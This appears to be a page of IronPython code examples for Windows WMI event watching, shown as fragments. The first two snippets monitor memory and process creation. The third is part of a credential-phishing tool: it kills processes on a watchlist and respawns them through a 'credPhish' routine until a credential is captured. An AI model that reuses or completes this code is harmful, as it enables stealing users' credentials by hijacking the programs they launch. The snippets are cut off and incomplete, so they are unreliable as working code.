Ejemplo n.º 1
0
# For impersonation rather than authentication:
# from System.Management import AuthenticationLevel, ImpersonationLevel
# options.Impersonation = ImpersonationLevel.Impersonate
# options.Authentication = AuthenticationLevel.Default

options.EnablePrivileges = True
scope =  ManagementScope(r"\\FullComputerName\root\cimv2", options)

# Available Physical Memory dropping below 10Mb 
wql = ('TargetInstance ISA "Win32_OperatingSystem" AND '
       'TargetInstance.FreePhysicalMemory < 10000 ')

timeout = TimeSpan(0, 0, 5)
query = WqlEventQuery("__InstanceModificationEvent", timeout, wql)

watcher = ManagementEventWatcher()
watcher.Query = query
watcher.Scope = scope

interesting_properties = (
    'FreePhysicalMemory',
    'FreeSpaceInPagingFiles',
    'FreeVirtualMemory',
    'NumberOfProcesses',
    'NumberOfUsers',
    'OSArchitecture',
    'ServicePackMajorVersion',
    'ServicePackMinorVersion',
    'SizeStoredInPagingFiles',
    'Status',
    'TotalVirtualMemorySize',
Ejemplo n.º 2
0
import clr
clr.AddReference('System.Management')
from System.Management import WqlEventQuery, ManagementEventWatcher

from System import TimeSpan
from System.Threading import Thread

timeout = TimeSpan(0, 0, 1)

query = WqlEventQuery("__InstanceCreationEvent", timeout, 'TargetInstance isa "Win32_Process"')

watcher = ManagementEventWatcher()
watcher.Query = query

def arrived(sender, event):
    print 'Event arrived'
    real_event = event.NewEvent
    instance = real_event['TargetInstance']
    
    for entry in instance.Properties:
        print entry.Name, entry.Value

        
watcher.EventArrived += arrived
watcher.Start()

print 'started'
while True:
    Thread.CurrentThread.Join(1000)
Ejemplo n.º 3
0
    proc = e.NewEvent
    if proc['TargetInstance']['Name'] in WATCHLIST:
        Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
        print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
        cp = credPhish(proc)
        print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments)
        cp.NewProcess.Start()
        print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode)

def procWatch():
    print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST))
    while GOT_CRED is False:
        try:
            proc = startWatch.WaitForNextEvent()
            if proc['TargetInstance']['Name'] in WATCHLIST:
                Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
                print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
                
                cp = credPhish(proc)
                if hasattr(cp, "NewProcess"):
                    cp.NewProcess.Start()
                    print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments)
                    #Process.GetCurrentProcess.Kill()
                    Thread.GetCurrentThread().Abort()
        except:
            break
try:
    startWatch = ManagementEventWatcher(WqlEventQuery("__InstanceCreationEvent", TimeSpan(0,0,1), 'TargetInstance isa "Win32_Process"' ))
    procWatch()
except KeyboardInterrupt:
    print "[*] Exiting."